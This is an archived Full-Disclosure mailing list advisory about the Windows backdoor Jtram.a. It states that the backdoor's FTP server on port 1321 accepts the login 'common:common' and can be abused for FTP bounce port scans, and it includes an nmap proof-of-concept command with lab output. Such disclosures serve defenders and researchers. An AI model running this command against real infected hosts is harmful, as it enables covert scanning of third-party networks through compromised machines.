lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 5 Jan 2022 21:51:12 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Backdoor.Win32.Jtram.a / Port Bounce Scan

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/596882dfba543b23ad3225d24ee5e800_B.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Jtram.a
Vulnerability: Port Bounce Scan
Description: The malware listens on TCP port 1321. Third-party intruders
who successfully logon can abuse the backdoor FTP server as a
man-in-the-middle machine allowing PORT Command bounce scan attacks using
Nmap. This vulnerability allows remote attackers to abuse your system and
discreetly conduct network port scanning. Victims will then think these
scans are originating from the infected system running the afflicted
malware FTP Server and not you.
Type: PE32
MD5: 596882dfba543b23ad3225d24ee5e800
Vuln ID: MVID-2022-0443
Disclosure: 01/05/2022


Exploit/PoC:
nmap -n -Pn -b common:common@....168.18.129:1321 -p21,22,80 192.168.18.237
-v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-29 19:11 Pacific
Standard Time
Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).
Attempting connection to ftp://common:common@....168.18.129:1321
Connected:220-rconnect 3.12, by WhitSoft Development (www.whitsoftdev.com)
220-You are connecting from 130.18.168.192.in-addr.arpa:5074.
220 Proceed with login.
Login credentials accepted by FTP server!
Initiating Bounce Scan at 19:12
Discovered open port 80/tcp on 192.168.18.237
Completed Bounce Scan at 19:12, 2.11s elapsed (3 total ports)
Nmap scan report for 192.168.18.237
Host is up.

PORT   STATE  SERVICE
21/tcp closed ftp
22/tcp closed ssh
80/tcp open   http

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 11.28 seconds


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ